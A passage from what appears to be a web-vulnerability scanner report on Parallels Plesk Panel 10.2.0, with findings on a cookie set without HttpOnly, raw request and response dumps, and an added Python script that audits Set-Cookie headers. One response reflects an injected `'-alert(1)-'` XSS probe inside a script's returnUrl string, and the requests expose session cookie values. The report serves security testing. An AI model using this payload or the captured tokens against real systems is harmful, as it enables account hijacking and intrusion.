                   addClass(sc, "show");
               }

               var s = document.getElementById("BackupLocalRepositoryListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function BackupLocalRepositoryListSearchHide()
           {
               var sc = document.getElementById("BackupLocalRepositoryListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("BackupLocalRepositoryListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function BackupLocalRepositoryListRemove(f)
           {
               if (0 == BackupLocalRepositoryListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/backup/local-repository/";
               lsubmit(f);
               return false;
           }
       </script>
           </div>
       </td></tr>        
       </table>
   </fieldset>
</div>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.17. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/schedule/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/schedule/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. Note that the session cookie sent in the request (PLESKSESSID) is not set by this response, so its flags are not assessed by this finding.
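Findings 5.16 and 5.17 report the same condition: the response sets psaContext with path=/ and no HttpOnly attribute, while the session cookie PLESKSESSID appears only in the request. The script below is an added example, not part of the XSS.CX report and not Plesk code, that reproduces the check offline on a raw response: it parses every Set-Cookie header, reports a missing HttpOnly (and a missing Secure when the panel is reached over TLS), and separates session-like cookies from state cookies so the two cases get different severities, which is the distinction the scanner text draws. REPORT_RESPONSE is built from the headers shown in 5.16 with the body dropped; CONSTRUCTED_RESPONSE, the session-name list beyond PLESKSESSID, the 32-hex-digit token heuristic and the severity labels are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Added example (not from the XSS.CX report or from Plesk): audit Set-Cookie
# headers of a raw HTTP response for missing HttpOnly / Secure attributes.

# Names treated as session cookies. PLESKSESSID is taken from the request
# headers in the report; the other names are an assumption for this example.
SESSION_NAMES = {"plesksessid", "phpsessid", "asp.net_sessionid", "jsessionid"}
# Heuristic for an unrecognised session token: a long run of hex digits
# (PLESKSESSID in the report is 32 hex chars). Deliberately does not match
# the base64 list-state cookies (domainaliaseslist etc.) seen in the request.
TOKEN_RE = re.compile(r"[0-9a-f]{32,}")


@dataclass
class CookieFinding:
    name: str
    value: str
    missing: tuple        # attributes absent from the Set-Cookie header
    session_like: bool    # name or value suggests a session token
    severity: str         # "Information" or "Low" (assumed labels)


def parse_set_cookie(header_value: str):
    """Split 'name=value; attr; attr=val' into (name, value, {attr: val|True})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else True
    return name.strip(), value.strip(), attrs


def response_headers(raw: str):
    """Return [(name, value), ...] from a raw response; the body is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    out = []
    for line in head.split("\r\n")[1:]:   # skip the status line
        key, sep, val = line.partition(":")
        if sep:
            out.append((key.strip(), val.strip()))
    return out


def looks_like_session(name: str, value: str) -> bool:
    return name.lower() in SESSION_NAMES or bool(TOKEN_RE.fullmatch(value))


def audit_cookies(raw_response: str, over_tls: bool = False):
    """Report every cookie set without HttpOnly (and, over TLS, without Secure)."""
    findings = []
    for key, val in response_headers(raw_response):
        if key.lower() != "set-cookie":
            continue
        name, value, attrs = parse_set_cookie(val)
        missing = []
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        if over_tls and "secure" not in attrs:
            missing.append("Secure")
        if not missing:
            continue
        session_like = looks_like_session(name, value)
        findings.append(CookieFinding(
            name=name, value=value, missing=tuple(missing),
            session_like=session_like,
            severity="Low" if session_like else "Information",
        ))
    return findings


# Headers copied from the response in finding 5.16; the HTML body is omitted.
REPORT_RESPONSE = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0",
    "Pragma: no-cache",
    "Content-Type: text/html; charset=utf-8",
    "Server: Microsoft-IIS/7.5",
    "Set-Cookie: psaContext=dashboard; path=/",
    "X-Powered-By: ASP.NET",
    "Connection: close",
    "",
    "<!DOCTYPE html ...>",
])

# Constructed response (not observed in the report) that also sets the
# session cookie without HttpOnly, to show the severity escalation.
CONSTRUCTED_RESPONSE = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Set-Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; path=/",
    "Set-Cookie: psaContext=dashboard; path=/; HttpOnly",
    "",
    "",
])

if __name__ == "__main__":
    for f in audit_cookies(REPORT_RESPONSE) + audit_cookies(CONSTRUCTED_RESPONSE, over_tls=True):
        tag = " (session-like)" if f.session_like else ""
        print(f"{f.severity:12} {f.name}: missing {', '.join(f.missing)}{tag}")
```

Run it as a script to print the findings, or import audit_cookies() and pass it the raw response captured by a proxy. The port 8880 panel in the report is plain HTTP, so over_tls stays False there and only HttpOnly is checked; the hex heuristic is coarse and should be widened if a target uses non-hex session identifiers.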

Request

GET /plesk/client@2/domain@1/backup/schedule/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/ftp-repository/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:40:15 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:40:14 GMT
Connection: close
Content-Length: 20180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Frootf16ee%27-alert%281%29-%2737b7e59ff57%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span><IMG src="/skins/default/plesk/icons/off.gif" width="16" height="16" alt="off.gif" title="" onMouseMove="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;This scheduled backup task is not active&quot;&#125;]);" onMouseOut="tooltip.hide();">Scheduled Backup Settings</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.schedule/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/backup/ftp-repository/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
function backupPeriodChanged()
{
   if ( $('fid-backup_period').value == 604800) {
       $('weeklyBlock').show();
       $('monthlyBlock').hide();
   } else if ( $('fid-backup_period').value == 2592000) {
       $('weeklyBlock').hide();
       $('monthlyBlock').show();
   } else {
       $('weeklyBlock').hide();
       $('monthlyBlock').hide();
   }
}

function splitBackupChanged()
{
   if ( $('fid-split_size_on').checked ) {
       $('fid-split_size').enable();
   } else {
       $('fid-split_size').disable();
   }
}

function suspendDomainChanged()
{
   if ( $('fid-suspend_domain_checkbox').checked ) {
       $('fid-suspend').value = "true";
       $('suspend_domain_warning').show();
   } else {
       $('fid-suspend').value = "false";
       $('suspend_domain_warning').hide();
   }
}

function initScreen()
{
   Event.observe('fid-backup_period', 'keypress', backupPeriodChanged);
   Event.observe('fid-backup_period', 'change', backupPeriodChanged);
   Event.observe('fid-suspend_domain_checkbox', 'click', suspendDomainChanged);
   backupPeriodChanged();
   splitBackupChanged();
   suspendDomainChanged();
}

if (Prototype.Browser.IE) {
   Event.observe(window, "load", initScreen);
} else {
   Event.observe(document, "dom:loaded", initScreen);
}

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Backup Manager: Personal FTP Repository","href":"\/plesk\/client@2\/domain@1\/backup\/ftp-repository\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/backup/schedule/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Schedule</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr>
   <td class="name"><label for="fid-backup_enable">Activate this backup task</label></td>
   <td><input type="checkbox" class="checkbox" name="backup_enable" id="fid-backup_enable" value="true" /></td>    
</tr>

<tr >
   <td class="name"><label for="fid-backup_period">Backup period</label></td>
   <td><select name="backup_period" id="fid-backup_period" >    <option value='86400' SELECTED>Daily</option>
   <option value='604800'>Weekly</option>
   <option value='2592000'>Monthly</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-backup_hour">Start backup creation at (HH:mm)&nbsp;<span class="required">*</span></label></td>
   <td>
       <input type="text" name="backup_hour" id="fid-backup_hour" value="14" size="2" maxlength="2" />
       :
       <input type="text" name="backup_minute" id="fid-backup_minute" value="40" size="2" maxlength="2" />
       
       <span id="weeklyBlock" style="display:none;">every <select name="backup_weekday" id="fid-backup_weekday" >    <option value='7'>Sunday</option>
   <option value='1'>Monday</option>
   <option value='2'>Tuesday</option>
   <option value='3'>Wednesday</option>
   <option value='4'>Thursday</option>
   <option value='5'>Friday</option>
   <option value='6'>Saturday</option>
</select>
</span>
       <span id="monthlyBlock" style="display:none;">every <select name="backup_monthday" id="fid-backup_monthday" >    <option value='1'>first</option>
   <option value='2'>2</option>
   <option value='3'>3</option>
   <option value='4'>4</option>
   <option value='5'>5</option>
   <option value='6'>6</option>
   <option value='7'>7</option>
   <option value='8'>8</option>
   <option value='9'>9</option>
   <option value='10'>10</option>
   <option value='11'>11</option>
   <option value='12'>12</option>
   <option value='13'>13</option>
   <option value='14'>14</option>
   <option value='15'>15</option>
   <option value='16'>16</option>
   <option value='17'>17</option>
   <option value='18'>18</option>
   <option value='19'>19</option>
   <option value='20'>20</option>
   <option value='21'>21</option>
   <option value='22'>22</option>
   <option value='23'>23</option>
   <option value='24'>24</option>
   <option value='25'>25</option>
   <option value='26'>26</option>
   <option value='27'>27</option>
   <option value='28'>28</option>
   <option value='29'>29</option>
   <option value='30'>30</option>
   <option value='31'>last</option>
</select>
day of month</span>
   </td>
</tr>

</table>
</td></tr></table>

</fieldset>

<fieldset>

<legend>Backup settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-prefix">Add prefix to backup name</label></td>
   <td><input type="text" name="prefix" id="fid-prefix" value="" size="30" maxlength="255" /></td>

</tr>

<tr >
   <td class="name"><label for="fid-split_size_on">Create multivolume backup</label></td>
   <td>
       <input type="checkbox" class="checkbox" name="split_size_on" value="true" id="fid-split_size_on" onClick="splitBackupChanged();">
       <label for="fid-split_size">&nbsp;Volume size&nbsp;</label>
       <input type="text" name="split_size" id="fid-split_size" value="2047" size=8 maxlength=8 />MB
   </td>
</tr>

<tr>
   <td class="name">Store backup in</td>
   <td>

       <div class="option"><input name="repository" id="fid-store_repository-local" value="local" type="radio" class="radiobox" CHECKED>&nbsp;<label for="fid-store_repository-local">Server repository</label></div>


       <div class="option"><input name="repository" id="fid-store_repository-ftp" value="ftp" type="radio" class="radiobox" >&nbsp;<label for="fid-store_repository-ftp">Personal FTP repository</label><SPAN class="warningHint">FTP repository settings are not specified</SPAN></div>        

   </td>
</tr>

<tr >
   <td class="name"><label for="fid-max_dump_files">Maximum number of backups in repository</label></td>
   <td><input type="text" name="max_dump_files" id="fid-max_dump_files" value="" size="5" maxlength="4"><br/>
   <span class="hint">To save hard disk space, you can limit the number of backups stored in repository for each scheduled backup task. When this limit is reached, new backups replace oldest backups in the repository.</span>
   </td>
</tr>

<tr >
   <td class="name"><label for="fid-email">If any errors were encountered during the execution of this scheduled backup task, send notification e-mail to</label></td>
   <td><input type="text" name="email" id="fid-email" value="" size="30" maxlength="255"></td>
</tr>

</table>
</td></tr></table>

</fieldset>

<fieldset>

<legend>Backup content</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr>
   <td class="name">Back up</td>
   <td>
       <div class="option"><input name="backup_content" id="fid-backup_content_configuration" value="configuration" type="radio" class="radiobox" />&nbsp;<label for="fid-backup_content_configuration">Domain configuration</label></div>
       <div class="option"><input name="backup_content" id="fid-backup_content_all" value="all" type="radio" class="radiobox" CHECKED />&nbsp;<label for="fid-backup_content_all">Domain configuration and content</label></div>
   </td>
</tr>


   <tr>
       <td class="name"><label for="fid-suspend_domain_checkbox">Suspend domain until backup task is completed</label></td>
       <td class="withWarning"><input type="checkbox" class="checkbox" name="suspend_domain_checkbox" id="fid-suspend_domain_checkbox" value="true" CHECKED />
       <input type="hidden" id="fid-suspend" name="suspend" value="" />
       <span id='suspend_domain_warning' style="display:none;" class="warningHint">Domain will be unavailable during the backup process</span>
       </td>
   </tr>


</table>
</td></tr></table>

</fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lsubmit(document.forms[0]);;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);lsubmit(document.forms[0]);;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="48333f77aef379c04c82252b59636182">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.18. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/certificate@

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/certificate@

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/certificate@ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:39 GMT
Connection: close
Content-Length: 19232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Ffile-manager%252F%253Fcmd%253Dchdir%2526file%253D%252Fhttpdocs%26src%3D%252Fsmb%252Fweb%252Fview%252Fid%252F1%252FsiteId%252F1%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
